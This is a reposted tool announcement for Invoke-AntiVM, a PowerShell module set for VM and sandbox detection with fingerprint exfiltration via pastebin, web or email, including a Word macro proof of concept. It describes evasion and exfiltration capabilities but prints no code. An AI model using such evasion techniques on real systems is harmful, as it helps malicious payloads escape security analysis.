Invoke-Antivm - Powershell Tool For VM Evasion
2020-11-21 05:30:00 Author: www.blogger.com(查看原文) 阅读量:144 收藏
tag:blogger.com,1999:blog-8317222231133660547.post-62818856344562570312020-11-20T17:30:00.004-03:002020-11-20T17:30:06.223-03:00Invoke-Antivm - Powershell Tool For VM Evasion<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-RPQ0Umui1AA/X7X8bO2r6aI/AAAAAAAAUbU/aii-9SDJo5QoqrXlkFCvYO6vdttlTan8QCNcBGAsYHQ/s811/powershell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="442" data-original-width="811" height="348" src="https://1.bp.blogspot.com/-RPQ0Umui1AA/X7X8bO2r6aI/AAAAAAAAUbU/aii-9SDJo5QoqrXlkFCvYO6vdttlTan8QCNcBGAsYHQ/w640-h348/powershell.png" width="640" /></a></div><p><br /></p> <p>Invoke-AntiVM is a set of modules to perform VM detection and <a href="https://www.kitploit.com/search/label/Fingerprinting" target="_blank" title="fingerprinting">fingerprinting</a> (with exfiltration) via Powershell.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Compatibility</b></span><br /> <p>Run the script check-compatibility.ps1 to check what modules or functions are compatibile with the powershell version. Our goal is to achieve compatibility from 2.0 but we are not there yet. Please run check-compability.ps1 to see what are the current compatiblity issues.</p> <br /><span style="font-size: large;"><b>Background</b></span><br /> <p>We wrote this tool to unify several techniques to identify VM or sandbox technologies. It relies on both signature and behavioural signals to identify whether a host is a VM or not. The modules are categorized into logical groups: CPU, Execution,Network,Programs. The user can also decide to exfiltrate a <a href="https://www.kitploit.com/search/label/Fingerprint" target="_blank" title="fingerprint">fingerprint</a> of the target host to be able to determine what features can be used to identify a sandbox or VM solution.</p> <br /><span style="font-size: large;"><b>Purpose</b></span><br /> <p>Invoke-AntiVM exists was developed to understand what is the implication of using <a href="https://www.kitploit.com/search/label/Obfuscation" target="_blank" title="obfuscation">obfuscation</a> and anti-vm tricks in powershell payloads. We hope this will help Red Teams to avoid analysis of their payload and Blue Teams to understand how to debofuscate a script with evasion techniques. You could either use the main module file Invoke-AntiVM.psd1 or use the singular ps1 script files if you want to reduce the size.</p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>Usage examples are provided in the following scripts:</p> <ul> <li>detect.ps1: this shows an example script of how to call the different tests</li> <li>usage.ps1: this shows basic usage</li> <li>usage_more.ps1: this shows more advanced functions</li> <li>usage_exfil.ps1: this shows how to exfiltrate host information as a json document via pastebin, web or email</li> <li>usage_fingerprint_file.ps1: this shows the <a href="https://www.kitploit.com/search/label/Exfiltration" target="_blank" title="exfiltration">exfiltration</a> module and what data is generated in the form of a json document</li> <li>poc_fingerprint_combined.ps1: this shows the fingerprinting module used against online sandboxes</li> <li>output/poc.docm: this shows an example MS Word attack with a macro to call the fingerprinting module (uploaded previously to a server)</li> </ul> <p>The folder pastebin contains a python script:</p> <ul> <li>full_fingerprints.py that download all the pastes</li> <li>decode_pastebins.ps1 to decompress and decode the fingerprint documents</li> </ul> <p>You have to make sure you use the same encryption key you used during the exfiltration step. The folder package shows how can you package all the scripts into a singular file for better portability. The folder pastebin shows how to pull automatically and decode the exfiltrated documents from pastebin.</p> <br /><span style="font-size: large;"><b>Installation</b></span><br /> <p>The source code for <a href="https://www.kitploit.com/search/label/Invoke-CradleCrafter" target="_blank" title="Invoke-CradleCrafter">Invoke-CradleCrafter</a> is hosted at Github, and you may download, fork and review it from this repository (<a href="https://github.com/robomotic/invoke-antivm" rel="nofollow" target="_blank" title="https://github.com/robomotic/invoke-antivm">https://github.com/robomotic/invoke-antivm</a>). Please report issues or feature requests through Github's bug tracker associated with this project.</p> <p>To install: run the script install_module.ps1</p> <br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/robomotic/invoke-antivm" rel="nofollow" target="_blank" title="Download Invoke-Antivm">Download Invoke-Antivm</a></span></b></div>Zion3R[email protected]

文章来源: http://www.blogger.com/feeds/8317222231133660547/posts/default/6281885634456257031
如有侵权请联系:admin#unsafe.sh